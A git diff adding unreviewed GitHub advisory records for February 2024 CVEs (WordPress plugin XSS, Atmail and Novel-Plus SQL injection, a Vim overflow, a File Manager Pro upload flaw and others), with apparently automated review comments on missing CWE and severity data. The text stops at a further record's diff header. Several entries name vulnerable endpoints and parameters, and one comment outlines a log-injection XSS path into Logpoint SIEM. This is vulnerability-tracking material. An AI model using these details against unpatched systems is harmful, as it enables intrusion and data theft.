b/advisories/unreviewed/2024/02/GHSA-j9rf-q3p6-99gv/GHSA-j9rf-q3p6-99gv.json new file mode 100644 index 0000000000000..5c67944748b5d --- /dev/null +++ b/advisories/unreviewed/2024/02/GHSA-j9rf-q3p6-99gv/GHSA-j9rf-q3p6-99gv.json 
@@ -0,0 +1,35 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-j9rf-q3p6-99gv", + "modified": "2024-02-06T18:30:21Z", + "published": "2024-02-06T18:30:21Z", + "aliases": [ + "CVE-2024-24291" + ], + "details": "An issue in the component /member/index/login of yzmcms v7.0 allows attackers to direct users to malicious sites via a crafted URL.", + "severity": [ + + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-24291" + }, + { + "type": "WEB", + "url": "https://gitee.com/wgd0ay/wgd0ay/issues/I8WSD1" + } + ], + "database_specific": { + "cwe_ids": [ + + ], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-02-06T16:15:52Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/02/GHSA-jc76-h9fq-qvwx/GHSA-jc76-h9fq-qvwx.json b/advisories/unreviewed/2024/02/GHSA-jc76-h9fq-qvwx/GHSA-jc76-h9fq-qvwx.json new file mode 100644 index 0000000000000..5f4a5375e1e2b --- /dev/null +++ b/advisories/unreviewed/2024/02/GHSA-jc76-h9fq-qvwx/GHSA-jc76-h9fq-qvwx.json @@ -0,0 +1,35 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-jc76-h9fq-qvwx", + "modified": "2024-02-07T21:30:27Z", + "published": "2024-02-07T21:30:27Z", + "aliases": [ + "CVE-2023-38995" + ], + "details": "An issue in SCHUHFRIED v.8.22.00 allows remote attacker to obtain the database password via crafted curl command.", + "severity": [ + + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-38995" + }, + { + "type": "WEB", + "url": "https://github.com/post-cyberlabs/CVE-Advisory/blob/main/CVE-2023-38995-Schuhfried-Preauth-PrivEsc.pdf" + } + ], + "database_specific": { + "cwe_ids": [ + + ], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-02-07T20:15:49Z" + } +} \ No newline at end of file 
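Review bot: The description of GHSA-j9rf-q3p6-99gv ("direct users to malicious sites via a crafted URL" at `/member/index/login`) is an open redirect, which maps to CWE-601, yet `cwe_ids` is empty and `severity` is null, so the record will not appear in CWE- or severity-filtered views. The only non-NVD reference is a Gitee issue on what looks like a personal repository rather than the yzmcms project, so neither the v7.0 bound nor the existence of a fix can be checked from this record. On curation, `"cwe_ids": ["CWE-601"]` matches the text, and a vendor or fix reference should be added when one exists.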
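Review bot: In GHSA-jc76-h9fq-qvwx the referenced PDF is named `CVE-2023-38995-Schuhfried-Preauth-PrivEsc.pdf`, which implies an unauthenticated path to the database password, yet the record ships with `"severity": null` and an empty `cwe_ids`, so one of the more serious entries in this batch is the least likely to be surfaced by filters. The description ("via crafted curl command") names the tool rather than the weakness; if the write-up confirms the credential is returned without authentication, CWE-522 (insufficiently protected credentials) or CWE-306 (missing authentication) is the mapping to add. The sole reference is a third-party research repository, so a vendor advisory should be linked if one exists.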
diff --git a/advisories/unreviewed/2024/02/GHSA-jc8h-8h7p-qc4h/GHSA-jc8h-8h7p-qc4h.json b/advisories/unreviewed/2024/02/GHSA-jc8h-8h7p-qc4h/GHSA-jc8h-8h7p-qc4h.json new file mode 100644 index 0000000000000..897f1872a4e2d --- /dev/null +++ b/advisories/unreviewed/2024/02/GHSA-jc8h-8h7p-qc4h/GHSA-jc8h-8h7p-qc4h.json @@ -0,0 +1,46 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-jc8h-8h7p-qc4h", + "modified": "2024-02-03T06:30:24Z", + "published": "2024-02-03T06:30:24Z", + "aliases": [ + "CVE-2024-0895" + ], + "details": "The PDF Flipbook, 3D Flipbook – DearFlip plugin for WordPress is vulnerable to Stored Cross-Site Scripting via outline settings in all versions up to, and including, 2.2.26 due to insufficient input sanitization and output escaping on user supplied data. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-0895" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/browser/3d-flipbook-dflip-lite/trunk/inc/metaboxes.php#L483" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3030441%403d-flipbook-dflip-lite&new=3030441%403d-flipbook-dflip-lite&sfp_email=&sfph_mail=" + }, + { + "type": "WEB", + "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/92e37b28-1a17-417a-b40f-cb4bbe6ec759?source=cve" + } + ], + "database_specific": { + "cwe_ids": [ + + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-02-03T06:15:47Z" + } +} \ No newline at end of file 
diff --git a/advisories/unreviewed/2024/02/GHSA-jcfq-f3pm-f9px/GHSA-jcfq-f3pm-f9px.json b/advisories/unreviewed/2024/02/GHSA-jcfq-f3pm-f9px/GHSA-jcfq-f3pm-f9px.json new file mode 100644 index 0000000000000..f6240b1af73d0 --- /dev/null +++ b/advisories/unreviewed/2024/02/GHSA-jcfq-f3pm-f9px/GHSA-jcfq-f3pm-f9px.json @@ -0,0 +1,38 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-jcfq-f3pm-f9px", + "modified": "2024-02-08T12:30:48Z", + "published": "2024-02-08T12:30:48Z", + "aliases": [ + "CVE-2024-24881" + ], + "details": "Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in VeronaLabs WP SMS – Messaging & SMS Notification for WordPress, WooCommerce, GravityForms, etc allows Reflected XSS.This issue affects WP SMS – Messaging & SMS Notification for WordPress, WooCommerce, GravityForms, etc: from n/a through 6.5.2.\n\n", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:L" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-24881" + }, + { + "type": "WEB", + "url": "https://patchstack.com/database/vulnerability/wp-sms/wordpress-wp-sms-plugin-6-5-2-reflected-cross-site-scripting-xss-vulnerability?_s_id=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-79" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-02-08T12:15:56Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/02/GHSA-jhwv-44fv-jwp5/GHSA-jhwv-44fv-jwp5.json b/advisories/unreviewed/2024/02/GHSA-jhwv-44fv-jwp5/GHSA-jhwv-44fv-jwp5.json new file mode 100644 index 0000000000000..c0de923bee3ba --- /dev/null +++ b/advisories/unreviewed/2024/02/GHSA-jhwv-44fv-jwp5/GHSA-jhwv-44fv-jwp5.json 
@@ -0,0 +1,39 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-jhwv-44fv-jwp5", + "modified": "2024-02-05T09:30:28Z", + "published": "2024-02-05T09:30:28Z", + "aliases": [ + "CVE-2024-22667" + ], + "details": "Vim before 9.0.2142 has a stack-based buffer overflow because did_set_langmap in map.c calls sprintf to write to the error buffer that is passed down to the option callback functions.", + "severity": [ + + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-22667" + }, + { + "type": "WEB", + "url": "https://github.com/vim/vim/commit/b39b240c386a5a29241415541f1c99e2e6b8ce47" + }, + { + "type": "WEB", + "url": "https://gist.githubusercontent.com/henices/2467e7f22dcc2aa97a2453e197b55a0c/raw/7b54bccc9a129c604fb139266f4497ab7aaa94c7/gistfile1.txt" + } + ], + "database_specific": { + "cwe_ids": [ + + ], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-02-05T08:15:44Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/02/GHSA-jjhm-fvgh-hv85/GHSA-jjhm-fvgh-hv85.json b/advisories/unreviewed/2024/02/GHSA-jjhm-fvgh-hv85/GHSA-jjhm-fvgh-hv85.json new file mode 100644 index 0000000000000..4249e3bcbc924 --- /dev/null +++ b/advisories/unreviewed/2024/02/GHSA-jjhm-fvgh-hv85/GHSA-jjhm-fvgh-hv85.json 
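Review bot: This record has `"severity": null` and an empty `cwe_ids` although the description pins a stack-based buffer overflow from an unbounded `sprintf` into the error buffer in `did_set_langmap` (map.c), which maps directly to CWE-121, and a fixing commit is referenced so the `before 9.0.2142` bound is verifiable. The second reference is a raw gist, presumably a reproducer, on a third-party account with no stability guarantee, so the commit should be treated as the authoritative reference. `affected` is empty as expected since Vim is not in a supported package ecosystem.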
@@ -0,0 +1,38 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-jjhm-fvgh-hv85", + "modified": "2024-02-02T00:31:26Z", + "published": "2024-02-02T00:31:26Z", + "aliases": [ + "CVE-2024-0325" + ], + "details": "In Helix Sync versions prior to 2024.1, a local command injection was identified. Reported by Bryan Riggins.  \n", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:L/I:L/A:N" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-0325" + }, + { + "type": "WEB", + "url": "https://perforce.com" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-94" + ], + "severity": "LOW", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-02-01T22:15:55Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/02/GHSA-jmx5-5g59-g2rw/GHSA-jmx5-5g59-g2rw.json b/advisories/unreviewed/2024/02/GHSA-jmx5-5g59-g2rw/GHSA-jmx5-5g59-g2rw.json new file mode 100644 index 0000000000000..98bed8973b9f9 --- /dev/null +++ b/advisories/unreviewed/2024/02/GHSA-jmx5-5g59-g2rw/GHSA-jmx5-5g59-g2rw.json 
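Review bot: The only non-NVD reference is the bare vendor homepage `https://perforce.com`, which gives a reader no way to confirm the 2024.1 fix or the nature of the "local command injection". The CWE tag `CWE-94` (code injection) also sits oddly against a description that says command injection, where CWE-77/CWE-78 is the usual mapping, and the AV:L/AC:H/PR:L vector yields LOW, so severity-filtered consumers will likely drop it. The fields presumably mirror the upstream record, but a curation pass should replace the homepage with the actual Perforce advisory page once located and reconsider the CWE.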
@@ -0,0 +1,39 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-jmx5-5g59-g2rw", + "modified": "2024-02-02T00:31:26Z", + "published": "2024-02-02T00:31:26Z", + "aliases": [ + "CVE-2024-1040" + ], + "details": "\n\n\nGessler GmbH WEB-MASTER user account is stored using a weak hashing algorithm. The attacker can restore the passwords by breaking the hashes stored on the device.\n\n\n\n", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:U/C:H/I:N/A:N" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-1040" + }, + { + "type": "WEB", + "url": "https://www.cisa.gov/news-events/ics-advisories/icsa-24-032-01" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-327", + "CWE-328" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-02-01T22:15:55Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/02/GHSA-jpv8-vxhj-7qmf/GHSA-jpv8-vxhj-7qmf.json b/advisories/unreviewed/2024/02/GHSA-jpv8-vxhj-7qmf/GHSA-jpv8-vxhj-7qmf.json new file mode 100644 index 0000000000000..725e2969b574b --- /dev/null +++ b/advisories/unreviewed/2024/02/GHSA-jpv8-vxhj-7qmf/GHSA-jpv8-vxhj-7qmf.json 
@@ -0,0 +1,38 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-jpv8-vxhj-7qmf", + "modified": "2024-02-06T03:33:00Z", + "published": "2024-02-06T03:33:00Z", + "aliases": [ + "CVE-2024-20819" + ], + "details": "Out out bounds Write vulnerabilities in svc1td_vld_plh_ap of libsthmbc.so prior to SMR Feb-2024 Release 1 allows local attackers to trigger buffer overflow.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:L/I:H/A:L" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-20819" + }, + { + "type": "WEB", + "url": "https://security.samsungmobile.com/securityUpdate.smsb?year=2024&month=02" + } + ], + "database_specific": { + "cwe_ids": [ + + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-02-06T03:15:09Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/02/GHSA-jqqj-j2ch-3qv8/GHSA-jqqj-j2ch-3qv8.json b/advisories/unreviewed/2024/02/GHSA-jqqj-j2ch-3qv8/GHSA-jqqj-j2ch-3qv8.json new file mode 100644 index 0000000000000..478c0a87c1f46 --- /dev/null +++ b/advisories/unreviewed/2024/02/GHSA-jqqj-j2ch-3qv8/GHSA-jqqj-j2ch-3qv8.json 
@@ -0,0 +1,35 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-jqqj-j2ch-3qv8", + "modified": "2024-02-07T15:30:48Z", + "published": "2024-02-07T15:30:48Z", + "aliases": [ + "CVE-2024-24133" + ], + "details": "Atmail v6.6.0 was discovered to contain a SQL injection vulnerability via the username parameter on the login page.", + "severity": [ + + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-24133" + }, + { + "type": "WEB", + "url": "https://github.com/Hebing123/cve/issues/16" + } + ], + "database_specific": { + "cwe_ids": [ + + ], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-02-07T14:15:52Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/02/GHSA-jr3p-prh6-2crg/GHSA-jr3p-prh6-2crg.json b/advisories/unreviewed/2024/02/GHSA-jr3p-prh6-2crg/GHSA-jr3p-prh6-2crg.json new file mode 100644 index 0000000000000..f62839534a993 --- /dev/null +++ b/advisories/unreviewed/2024/02/GHSA-jr3p-prh6-2crg/GHSA-jr3p-prh6-2crg.json 
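Review bot: A SQL injection reachable through the `username` parameter of the login page is by definition pre-authentication, yet this advisory has `"severity": null` and an empty `cwe_ids`, so any downstream consumer that filters on severity or weakness class will not surface it. The only supporting reference is a third-party issue tracker (`Hebing123/cve/issues/16`) rather than an Atmail advisory or fix, so the v6.6.0 bound is unverified from this record. On curation, `"cwe_ids": ["CWE-89"]` matches the description, and a vendor or fix reference should be added when one exists.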
@@ -0,0 +1,38 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-jr3p-prh6-2crg", + "modified": "2024-02-05T06:30:29Z", + "published": "2024-02-05T06:30:29Z", + "aliases": [ + "CVE-2023-51504" + ], + "details": "Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Dan Dulaney Dan's Embedder for Google Calendar allows Stored XSS.This issue affects Dan's Embedder for Google Calendar: from n/a through 1.2.\n\n", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:L" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-51504" + }, + { + "type": "WEB", + "url": "https://patchstack.com/database/vulnerability/dans-gcal/wordpress-dan-s-embedder-for-google-calendar-plugin-1-2-cross-site-scripting-xss-vulnerability?_s_id=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-79" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-02-05T06:15:46Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/02/GHSA-jv9f-872m-gv5x/GHSA-jv9f-872m-gv5x.json b/advisories/unreviewed/2024/02/GHSA-jv9f-872m-gv5x/GHSA-jv9f-872m-gv5x.json new file mode 100644 index 0000000000000..bc426b736d119 --- /dev/null +++ b/advisories/unreviewed/2024/02/GHSA-jv9f-872m-gv5x/GHSA-jv9f-872m-gv5x.json 
@@ -0,0 +1,38 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-jv9f-872m-gv5x", + "modified": "2024-02-06T18:30:20Z", + "published": "2024-02-01T12:30:22Z", + "aliases": [ + "CVE-2023-51532" + ], + "details": "Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Icegram Icegram Engage – WordPress Lead Generation, Popup Builder, CTA, Optins and Email List Building allows Stored XSS.This issue affects Icegram Engage – WordPress Lead Generation, Popup Builder, CTA, Optins and Email List Building: from n/a through 3.1.19.\n\n", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:L" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-51532" + }, + { + "type": "WEB", + "url": "https://patchstack.com/database/vulnerability/icegram/wordpress-icegram-engage-plugin-3-1-19-cross-site-scripting-xss-vulnerability?_s_id=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-79" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-02-01T11:15:08Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/02/GHSA-jxjp-cv56-m425/GHSA-jxjp-cv56-m425.json b/advisories/unreviewed/2024/02/GHSA-jxjp-cv56-m425/GHSA-jxjp-cv56-m425.json new file mode 100644 index 0000000000000..6c42c7b084306 --- /dev/null +++ b/advisories/unreviewed/2024/02/GHSA-jxjp-cv56-m425/GHSA-jxjp-cv56-m425.json 
@@ -0,0 +1,39 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-jxjp-cv56-m425", + "modified": "2024-02-06T18:30:21Z", + "published": "2024-02-06T18:30:21Z", + "aliases": [ + "CVE-2024-24015" + ], + "details": "A SQL injection vulnerability exists in Novel-Plus v4.3.0-RC1 and prior versions. An attacker can pass in crafted offset, limit, and sort parameters to perform SQL via /sys/user/exit", + "severity": [ + + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-24015" + }, + { + "type": "WEB", + "url": "https://github.com/201206030/novel-plus" + }, + { + "type": "WEB", + "url": "https://github.com/cxcxcxcxcxcxcxc/cxcxcxcxcxcxcxc/blob/main/cxcxcxcxcxc/about-2024/24015.txt" + } + ], + "database_specific": { + "cwe_ids": [ + + ], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-02-06T16:15:52Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/02/GHSA-jxrx-5cg2-pj56/GHSA-jxrx-5cg2-pj56.json b/advisories/unreviewed/2024/02/GHSA-jxrx-5cg2-pj56/GHSA-jxrx-5cg2-pj56.json new file mode 100644 index 0000000000000..66c51725519af --- /dev/null +++ b/advisories/unreviewed/2024/02/GHSA-jxrx-5cg2-pj56/GHSA-jxrx-5cg2-pj56.json 
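Review bot: The upstream repository `https://github.com/201206030/novel-plus` is listed with `"type": "WEB"`, whereas a repository link is normally typed `PACKAGE` in this database, which affects how tooling associates the advisory with the project. The description's "to perform SQL via /sys/user/exit" reads as a truncated "SQL injection" inherited from NVD and should be corrected upstream rather than here; `cwe_ids` is empty where `"cwe_ids": ["CWE-89"]` applies, and no severity is set for an injection through the `offset`, `limit` and `sort` parameters. No ecosystem package is identified, so the empty `affected` list is expected.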
@@ -0,0 +1,42 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-jxrx-5cg2-pj56", + "modified": "2024-02-02T03:30:32Z", + "published": "2024-02-02T03:30:32Z", + "aliases": [ + "CVE-2023-50933" + ], + "details": "IBM PowerSC 1.3, 2.0, and 2.1 is vulnerable to HTML injection. A remote attacker could inject malicious HTML code, which when viewed, would be executed in the victim's Web browser within the security context of the hosting site. IBM X-Force ID: 275113.\n\n", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-50933" + }, + { + "type": "WEB", + "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/275113" + }, + { + "type": "WEB", + "url": "https://www.ibm.com/support/pages/node/7113759" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-79" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-02-02T01:15:08Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/02/GHSA-m285-497c-62j9/GHSA-m285-497c-62j9.json b/advisories/unreviewed/2024/02/GHSA-m285-497c-62j9/GHSA-m285-497c-62j9.json new file mode 100644 index 0000000000000..72d658144a67f --- /dev/null +++ b/advisories/unreviewed/2024/02/GHSA-m285-497c-62j9/GHSA-m285-497c-62j9.json 
@@ -0,0 +1,42 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-m285-497c-62j9", + "modified": "2024-02-06T00:30:26Z", + "published": "2024-02-06T00:30:26Z", + "aliases": [ + "CVE-2023-6846" + ], + "details": "The File Manager Pro plugin for WordPress is vulnerable to Arbitrary File Upload in all versions up to, and including, 8.3.4 via the mk_check_filemanager_php_syntax AJAX function. This makes it possible for authenticated attackers, with subscriber access and above, to execute code on the server. Version 8.3.5 introduces a capability check that prevents users lower than admin from executing this function.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-6846" + }, + { + "type": "WEB", + "url": "https://gist.github.com/Kun19/046b2b305cac5f2edd38037984c2e8e3" + }, + { + "type": "WEB", + "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/1e8e0257-a745-495f-a103-c032b95209fc?source=cve" + } + ], + "database_specific": { + "cwe_ids": [ + + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-02-05T22:15:56Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/02/GHSA-m293-hr45-hwwr/GHSA-m293-hr45-hwwr.json b/advisories/unreviewed/2024/02/GHSA-m293-hr45-hwwr/GHSA-m293-hr45-hwwr.json new file mode 100644 index 0000000000000..91b96f8530773 --- /dev/null +++ b/advisories/unreviewed/2024/02/GHSA-m293-hr45-hwwr/GHSA-m293-hr45-hwwr.json 
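Review bot: `cwe_ids` is empty although the description pins the weakness precisely: a subscriber-level user reaches `mk_check_filemanager_php_syntax` because a capability check was missing until 8.3.5, an authorization bug (CWE-862) that yields an arbitrary file upload (CWE-434). `"cwe_ids": ["CWE-434", "CWE-862"]` would make the record consistent with the other entries in this batch that carry a CWE. The HIGH severity is consistent with the 8.8 vector (AV:N/PR:L with C:H/I:H/A:H); the empty `affected` list is expected since WordPress plugins are not a supported ecosystem.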
@@ -0,0 +1,39 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-m293-hr45-hwwr", + "modified": "2024-02-03T09:30:18Z", + "published": "2024-02-03T09:30:18Z", + "aliases": [ + "CVE-2023-49950" + ], + "details": "The Jinja templating in Logpoint SIEM 6.10.0 through 7.x before 7.3.0 does not correctly sanitize log data being displayed when using a custom Jinja template in the Alert view. A remote attacker can craft a cross-site scripting (XSS) payload and send it to any system or device that sends logs to the SIEM. If an alert is created, the payload will execute upon the alert data being viewed with that template, which can lead to sensitive data disclosure.", + "severity": [ + + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-49950" + }, + { + "type": "WEB", + "url": "https://github.com/shrikeinfosec/cve-2023-49950/blob/main/cve-2023-49950.md" + }, + { + "type": "WEB", + "url": "https://servicedesk.logpoint.com/hc/en-us/articles/14124495377437-Stored-XSS-Vulnerability-in-Alerts-via-Log-Injection" + } + ], + "database_specific": { + "cwe_ids": [ + + ], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-02-03T09:15:11Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/02/GHSA-m3w9-hqpm-7769/GHSA-m3w9-hqpm-7769.json b/advisories/unreviewed/2024/02/GHSA-m3w9-hqpm-7769/GHSA-m3w9-hqpm-7769.json new file mode 100644 index 0000000000000..18ca9f2b734c7 --- /dev/null +++ b/advisories/unreviewed/2024/02/GHSA-m3w9-hqpm-7769/GHSA-m3w9-hqpm-7769.json 
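Review bot: The attack path deserves flagging for SOC readers: the injection vector is any log line forwarded to the SIEM, so an attacker needs no access to Logpoint itself, only to a system whose logs it ingests, and the payload fires when an analyst views an alert rendered with a custom Jinja template. Despite that, the record has `"severity": null` and an empty `cwe_ids`, so it will drop out of severity-filtered feeds. The referenced vendor article is titled as a stored XSS via log injection, which supports `"cwe_ids": ["CWE-79"]` consistent with the other XSS entries in this batch, with CWE-117 (improper output neutralization for logs) as the secondary mapping to consider.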
@@ -0,0 +1,38 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-m3w9-hqpm-7769", + "modified": "2024-02-01T12:30:22Z", + "published": "2024-02-01T12:30:22Z", + "aliases": [ + "CVE-2023-51548" + ], + "details": "Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Neil Gee SlickNav Mobile Menu allows Stored XSS.This issue affects SlickNav Mobile Menu: from n/a through 1.9.2.\n\n", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:L" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-51548" + }, + { + "type": "WEB", + "url": "https://patchstack.com/database/vulnerability/slicknav-mobile-menu/wordpress-slicknav-mobile-menu-plugin-1-9-2-cross-site-scripting-xss-vulnerability?_s_id=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-79" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-02-01T11:15:10Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/02/GHSA-m4jj-vwgj-qpjf/GHSA-m4jj-vwgj-qpjf.json b/advisories/unreviewed/2024/02/GHSA-m4jj-vwgj-qpjf/GHSA-m4jj-vwgj-qpjf.json new file mode 100644 index 0000000000000..efa030544431e --- /dev/null +++ b/advisories/unreviewed/2024/02/GHSA-m4jj-vwgj-qpjf/GHSA-m4jj-vwgj-qpjf.json 
@@ -0,0 +1,38 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-m4jj-vwgj-qpjf", + "modified": "2024-02-06T12:30:30Z", + "published": "2024-02-06T12:30:30Z", + "aliases": [ + "CVE-2024-24936" + ], + "details": "In JetBrains TeamCity before 2023.11.2 access control at the S3 Artifact Storage plugin endpoint was missed", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-24936" + }, + { + "type": "WEB", + "url": "https://www.jetbrains.com/privacy-security/issues-fixed/" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-285" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-02-06T10:15:09Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/02/GHSA-m5gq-732f-j9v6/GHSA-m5gq-732f-j9v6.json b/advisories/unreviewed/2024/02/GHSA-m5gq-732f-j9v6/GHSA-m5gq-732f-j9v6.json new file mode 100644 index 0000000000000..935b545e057c6 --- /dev/null +++ b/advisories/unreviewed/2024/02/GHSA-m5gq-732f-j9v6/GHSA-m5gq-732f-j9v6.json 
